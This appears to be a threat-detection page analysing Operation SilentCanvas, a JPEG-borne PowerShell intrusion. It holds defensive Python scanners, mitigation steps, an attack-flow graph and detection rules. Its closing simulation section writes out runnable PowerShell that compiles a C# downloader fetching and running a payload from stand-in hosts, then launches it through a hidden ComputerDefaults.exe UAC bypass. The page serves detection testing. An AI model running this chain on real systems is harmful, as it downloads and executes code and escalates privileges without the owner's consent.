OPERATION SILENTCANVAS : JPEG BASED MULTISTAGE POWERSHELL INTRUSION
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Operation SilentCanvas is a sophisticated multi-stage intrusion that hides a malicious PowerShell payload inside a JPEG file named sysupdate.jpeg. That payload retrieves and compiles a custom launcher with csc.exe, abuses ComputerDefaults.exe to perform a fileless UAC bypass, and installs a trojanized ConnectWise ScreenConnect service named OneDriveServers to maintain persistent remote access. The malware communicates through encrypted channels routed to legitserver.theworkpc.com over ports 5443 and 8041. The campaign also places strong emphasis on defense evasion, credential harvesting, and covert surveillance.
Investigation
The report covers both static and dynamic analysis of the JPEG-based loader, the dynamically compiled uds.exe binary, and the modified ScreenConnect components. Researchers identified multiple offensive techniques, including AMSI bypass, living-off-the-land binary abuse, registry hijacking, and custom key derivation for encrypted communication. Infrastructure analysis revealed a hard-coded mapping between legitserver.theworkpc.com and the IP address 45.138.16.64. The investigation also exposed detailed victim profiling, local account manipulation, and functionality tied to hidden desktop access.
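An added example, not code from the original analysis: a Python walker over JPEG marker segments that shows where a loader like sysupdate.jpeg can carry non-image bytes. The report does not say how the payload was embedded, so the walker checks the two places a decoder ignores (COM/APPn metadata segments and bytes appended after the EOI marker); the sample file and its harmless stand-in "payload" string are constructed.

```python
import re
import struct

# Strings worth a second look in metadata or trailing bytes; tune to your environment.
SUSPICIOUS = re.compile(rb"(?i)powershell|\biex\b|invoke-expression|frombase64string|-enc\b")
APPENDED = b"\r\npowershell -NoProfile -Command Write-Host 'constructed sample'\r\n"  # harmless stand-in

def _in_scan(b: int) -> bool:
    """0xFF followed by 0x00 (stuffed byte) or RSTn is still entropy-coded data, not a marker."""
    return b == 0x00 or 0xD0 <= b <= 0xD7

def walk_jpeg(data: bytes) -> dict:
    """List marker segments, count bytes after EOI, and flag suspicious text with its offset."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI marker)")
    segments, hits, trailing, pos = [], [], 0, 2
    while pos + 2 <= len(data) and data[pos] == 0xFF:
        marker = data[pos + 1]
        if marker == 0xD9:                      # EOI: decoders stop here, anything after is not image data
            trailing = len(data) - (pos + 2)
            if SUSPICIOUS.search(data[pos + 2:]):
                hits.append(("after_EOI", pos + 2))
            break
        if pos + 4 > len(data):
            break                               # truncated segment header
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]   # big-endian, includes its own 2 bytes
        body = data[pos + 4:pos + 2 + length]
        segments.append((f"FF{marker:02X}", length))
        if marker == 0xFE or 0xE0 <= marker <= 0xEF:             # COM / APPn hold free-form metadata
            if SUSPICIOUS.search(body):
                hits.append((f"FF{marker:02X}", pos + 4))
        pos += 2 + length
        if marker == 0xDA:                                       # SOS: skip entropy-coded data to next marker
            while pos + 1 < len(data) and not (data[pos] == 0xFF and not _in_scan(data[pos + 1])):
                pos += 1
    return {"segments": segments, "trailing_bytes": trailing, "hits": hits}

def build_sample(with_payload: bool = True) -> bytes:
    """Constructed JPEG skeleton (SOI, APP0, COM, tiny SOS, EOI); not a decodable image."""
    app0 = b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    com = b"constructed comment"
    scan = b"\x12\xff\x00\x34"                                   # includes a stuffed FF 00 pair
    jpeg = (b"\xff\xd8"
            + b"\xff\xe0" + struct.pack(">H", len(app0) + 2) + app0
            + b"\xff\xfe" + struct.pack(">H", len(com) + 2) + com
            + b"\xff\xda" + struct.pack(">H", 3) + b"\x01" + scan
            + b"\xff\xd9")
    return jpeg + APPENDED if with_payload else jpeg
```

A real sample would be read from disk and passed to walk_jpeg; a non-zero trailing_bytes count or any hit is a reason to pull the file for static analysis rather than proof of malice.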
Mitigation
Defenders should apply strict allow-listing for legitimate remote monitoring and management tools and restrict or closely monitor execution of csc.exe, cvtres.exe, and ComputerDefaults.exe. Monitoring should also focus on suspicious ms-settings registry changes, PowerShell AMSI bypass behavior, hidden process creation flags, and unauthorized service creation involving the name OneDriveServers. Any accounts that may have been exposed should be reset, and affected systems should be isolated quickly to prevent further abuse.
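As an added example that is not part of the original report: a small Python triage pass that applies the monitoring points above to constructed Sysmon and System-log style events (process creation, registry change, service install, network connection). Field names follow Sysmon's Image/ParentImage/TargetObject/DestinationIp naming; every sample record is constructed, and records 2 and 6 are benign controls.

```python
import ntpath

LOLBINS = {"csc.exe", "cvtres.exe", "computerdefaults.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
C2_PORTS = {5443, 8041}
C2_IP = "45.138.16.64"             # hard-coded resolution of legitserver.theworkpc.com
ROGUE_SERVICE = "onedriveservers"  # service name installed by the trojanized ScreenConnect

def _name(path: str) -> str:
    return ntpath.basename(path).lower()   # file name of a Windows path, on any host OS

def triage(ev: dict) -> list:
    """Return the rule names this event matches; an empty list means nothing was flagged."""
    hits = []
    if ev.get("EventID") == 1:   # Sysmon process creation: dev utility spawned by PowerShell
        if _name(ev.get("Image", "")) in LOLBINS and _name(ev.get("ParentImage", "")) in SHELLS:
            hits.append("dev_utility_spawned_by_powershell")
    if ev.get("EventID") in (12, 13):   # Sysmon registry event touching the ms-settings handler
        if "\\ms-settings\\" in ev.get("TargetObject", "").lower():
            hits.append("ms_settings_registry_change")
    if ev.get("EventID") == 7045:   # System log: a new service was installed
        if ev.get("ServiceName", "").lower() == ROGUE_SERVICE:
            hits.append("rogue_service_onedriveservers")
    if ev.get("EventID") == 3:   # Sysmon network connection
        if int(ev.get("DestinationPort", 0)) in C2_PORTS or ev.get("DestinationIp") == C2_IP:
            hits.append("c2_nonstandard_port_or_known_ip")
    return hits

def run(events: list) -> dict:
    """Map RecordId -> hits for every event that matched at least one rule."""
    flagged = {}
    for ev in events:
        hits = triage(ev)
        if hits:
            flagged[ev["RecordId"]] = hits
    return flagged

# Constructed sample telemetry, not real campaign data.
SAMPLE_EVENTS = [
    {"RecordId": 1, "EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"RecordId": 2, "EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\MSBuild.exe"},   # build-tool parent
    {"RecordId": 3, "EventID": 13,
     "TargetObject": r"HKU\S-1-5-21-1000\Software\Classes\ms-settings\Shell\Open\command\(Default)"},
    {"RecordId": 4, "EventID": 7045, "ServiceName": "OneDriveServers"},
    {"RecordId": 5, "EventID": 3, "DestinationIp": "45.138.16.64", "DestinationPort": "5443"},
    {"RecordId": 6, "EventID": 3, "DestinationIp": "203.0.113.10", "DestinationPort": "443"},
]
```

Calling run(SAMPLE_EVENTS) flags records 1, 3, 4 and 5 and leaves the two controls alone; the per-user ms-settings class key is matched by substring so the rule also fires on the Sysmon HKU\...\_Classes path form.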
Response
If related indicators are detected, the endpoint should be quarantined immediately, the malicious uds.exe process and associated PowerShell activity should be terminated, and the OneDriveServers service should be removed from the host. Investigators should collect registry artifacts, service binaries, and network telemetry tied to the command-and-control infrastructure for deeper forensic review. All privileged credentials should be rotated, and defenders should monitor for lateral movement patterns associated with the techniques documented in the campaign.
"graph TB %% Class definitions classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff %% Nodes u2013 Actions action_initial_access["<b>Action</b> – <b>T1566 Phishing Attachment</b>: Email delivers malicious file <i>sysupdate.jpeg</i> masquerading as an image."] class action_initial_access action action_user_execution["<b>Action</b> – <b>T1204.002 User Execution</b> and <b>T1059.001 PowerShell</b>: Victim doubleu2011clicks the .jpeg which launches embedded PowerShell."] class action_user_execution action action_execution["<b>Action</b> – <b>T1562.001 Disable Security Tools</b> (AMSI bypass) and <b>T1027 Obfuscation</b>: PowerShell script evades detection and hides malicious logic."] class action_execution action action_dev_utility_abuse["<b>Action</b> – <b>T1127 Compile After Delivery</b> and <b>T1027.004 Obfuscated/Stored Files</b>: Script embeds C# source and compiles with <i>csc.exe</i> to create a custom launcher."] class action_dev_utility_abuse action action_priv_esc["<b>Action</b> – <b>T1548.002 Hijack Execution Flow</b> via <i>ms-settings</i> protocol and <b>T1218.002 Compiled HTML File</b> using <i>ComputerDefaults.exe</i> for a fileless UAC bypass."] class action_priv_esc action action_persistence["<b>Action</b> – <b>T1543.003 Windows Service</b> named <i>OneDriveServers</i> and <b>T1136.001 Local Account</b> creation of hidden admin accounts for longu2011term access."] class action_persistence action action_tool_hijack["<b>Action</b> – <b>T1553.002 Signed Binary Proxy Execution</b>: Deploys trojanized ConnectWise ScreenConnect binary abusing legitimate signed components."] class action_tool_hijack action action_credential_access["<b>Action</b> – <b>T1556.001 Credential API Hooking</b> and <b>T1056.001 Input Capture</b>: Installs Credential Provider hook and keylogger to harvest user credentials."] class action_credential_access action action_collection["<b>Action</b> – <b>T1113 Screen 
Capture</b>, <b>T1125 Video Capture</b>, <b>T1123 Audio Capture</b>, <b>T1115 Clipboard Data</b>: Gathers visual, audio and clipboard information."] class action_collection action action_discovery["<b>Action</b> – <b>T1518 Software Discovery</b>, <b>T1010 Application Window Discovery</b>, <b>T1082 System Information Discovery</b>: Enumerates installed software, AV products, system info and active windows."] class action_discovery action action_c2["<b>Action</b> – <b>T1573 Encrypted Channel</b>: Sets up encrypted C2 using PBKDF2/HMACu2011SHA256 keys and transfers additional tools via <b>T1105 Ingress Tool Transfer</b>."] class action_c2 action action_remote_execution["<b>Action</b> – <b>T1021 Remote Services</b>: Executes commands on the victim through the ScreenConnect framework."] class action_remote_execution action action_impact["<b>Action</b> – <b>T1529 System Shutdown/Reboot</b>: Can trigger a system reboot or safeu2011mode restart to disrupt the environment."] class action_impact action %% Nodes u2013 Tools / Processes tool_sysupdate_jpeg["<b>Tool</b> – <b>Name</b>: sysupdate.jpeg<br/><b>Type</b>: Malicious attachment disguised as image"] class tool_sysupdate_jpeg tool tool_powershell["<b>Tool</b> – <b>Name</b>: PowerShell<br/><b>Type</b>: Scripting engine used for execution and obfuscation"] class tool_powershell tool tool_csc["<b>Tool</b> – <b>Name</b>: csc.exe<br/><b>Type</b>: C# compiler leveraged onu2011host"] class tool_csc tool process_computerdefaults["<b>Process</b> – <b>Name</b>: ComputerDefaults.exe<br/><b>Description</b>: Used as a proxy for fileless UAC bypass"] class process_computerdefaults process tool_screenconnect["<b>Tool</b> – <b>Name</b>: ConnectWise ScreenConnect<br/><b>Type</b>: Remoteu2011access software hijacked with malicious payload"] class tool_screenconnect tool malware_keylogger["<b>Malware</b> – <b>Name</b>: Custom Keylogger<br/><b>Purpose</b>: Capture keystrokes and credentials"] class malware_keylogger malware %% Connections 
u2013 Attack Flow action_initial_access –>|delivers| tool_sysupdate_jpeg tool_sysupdate_jpeg –>|triggers| action_user_execution action_user_execution –>|executes| tool_powershell tool_powershell –>|performs| action_execution action_execution –>|uses| tool_csc tool_csc –>|creates| action_dev_utility_abuse action_dev_utility_abuse –>|produces launcher for| action_priv_esc action_priv_esc –>|invokes| process_computerdefaults process_computerdefaults –>|enables| action_persistence action_persistence –>|creates| action_tool_hijack action_tool_hijack –>|installs| tool_screenconnect tool_screenconnect –>|facilitates| action_credential_access action_credential_access –>|installs| malware_keylogger malware_keylogger –>|enables| action_collection action_collection –>|feeds data to| action_c2 action_c2 –>|supports| action_remote_execution action_remote_execution –>|uses| tool_screenconnect action_remote_execution –>|leads to| action_impact action_discovery –>|provides info for| action_c2 %% Styling class tool_sysupdate_jpeg tool class tool_powershell tool class tool_csc tool class tool_screenconnect tool class process_computerdefaults process class malware_keylogger malware "
Attack Flow
Detections
Possible UAC Bypass via CMSTPLUA COM Interface [SafaPay technique] (via cmdline)
Possible Antivirus or Firewall Software Enumeration (via process_creation)
Alternative Remote Access / Management Software (via process_creation)
An Archive Was Extracted To Suspicious Directory Using Powershell (via powershell)
IOCs (HashSha256) to detect: OPERATION SILENTCANVAS : JPEG BASED MULTISTAGE POWERSHELL INTRUSION
IOCs (SourceIP) to detect: OPERATION SILENTCANVAS : JPEG BASED MULTISTAGE POWERSHELL INTRUSION
IOCs (DestinationIP) to detect: OPERATION SILENTCANVAS : JPEG BASED MULTISTAGE POWERSHELL INTRUSION
Encrypted Communications with Attacker Infrastructure via Non-Standard Ports [Windows Network Connection]
Intrusion Detection via Abuse of csc.exe and ComputerDefaults.exe [Windows Process Creation]
PowerShell Execution with AMSI Bypass [Windows Powershell]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
Attack Narrative & Commands:
- Initial foothold: Attacker gains a low-privileged PowerShell session on the endpoint.
- Live compilation: Using the already-available csc.exe, the attacker compiles a C# downloader that fetches a second-stage payload from a C2 server. The compilation is launched from the PowerShell process to satisfy the parent-child condition.
- File-less UAC bypass: The attacker runs the newly-built executable via ComputerDefaults.exe, which silently requests elevation without showing a UAC prompt.
- Post-elevation execution: The elevated payload establishes a reverse shell back to the adversary.
# Step 1 – Prepare malicious C# source (in-memory)
$csSource = @"
using System;
using System.Net;
using System.Diagnostics;
public class Downloader {
    public static void Main() {
        using (WebClient wc = new WebClient()) {
            string payloadUrl = "http://malicious.example.com/payload.exe";
            // Resolve TEMP from C#: a PowerShell environment-variable reference inside this double-quoted here-string would expand into invalid C#
            string tempPath = System.IO.Path.Combine(System.IO.Path.GetTempPath(), "payload.exe");
            wc.DownloadFile(payloadUrl, tempPath);
            Process.Start(tempPath);
        }
    }
}
"@
$srcPath = "$env:TEMP\Downloader.cs"
$exePath = "$env:TEMP\Downloader.exe"
$csSource | Out-File -FilePath $srcPath -Encoding ASCII

# Step 2 – Compile via csc.exe (parent = PowerShell)
& "$env:WINDIR\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /nologo /t:exe /out:$exePath $srcPath

# Step 3 – Trigger UAC bypass using ComputerDefaults.exe (still child of PowerShell)
$computerDefaults = "$env:SystemRoot\System32\ComputerDefaults.exe"
Start-Process -FilePath $computerDefaults -ArgumentList "`"$exePath`"" -WindowStyle Hidden
Regression Test Script: (self‑contained PowerShell script that reproduces the above steps)
# -----------------------------------------------------------------
# File: trigger_csc_uac_bypass.ps1
# Purpose: Simulate the csc.exe + ComputerDefaults.exe attack chain
# -----------------------------------------------------------------
# Create malicious C# source in the TEMP directory
$src = @"
using System;
using System.Net;
using System.Diagnostics;
public class Payload {
    public static void Main() {
        using (WebClient wc = new WebClient()) {
            string url = "http://example.com/evil.exe";
            // Resolve TEMP from C#: a PowerShell environment-variable reference inside this double-quoted here-string would expand into invalid C#
            string path = System.IO.Path.Combine(System.IO.Path.GetTempPath(), "evil.exe");
            wc.DownloadFile(url, path);
            Process.Start(path);
        }
    }
}
"@
$srcPath = Join-Path $env:TEMP "Payload.cs"
$exePath = Join-Path $env:TEMP "Payload.exe"
$src | Out-File -FilePath $srcPath -Encoding ASCII

# Compile with csc.exe (this PowerShell process becomes the parent)
$csc = "$env:WINDIR\Microsoft.NET\Framework64\v4.0.30319\csc.exe"
& $csc /nologo /t:exe /out:$exePath $srcPath

# Execute via ComputerDefaults.exe to perform a silent UAC bypass
$computerDefaults = "$env:SystemRoot\System32\ComputerDefaults.exe"
Start-Process -FilePath $computerDefaults -ArgumentList "`"$exePath`"" -WindowStyle Hidden
Cleanup Commands:
# Remove generated artifacts
Remove-Item -Path "$env:TEMP\Payload.cs" -Force -ErrorAction SilentlyContinue
Remove-Item -Path "$env:TEMP\Payload.exe" -Force -ErrorAction SilentlyContinue
# Optionally terminate any lingering processes started by the test
Get-Process -Name "evil" -ErrorAction SilentlyContinue | Stop-Process -Force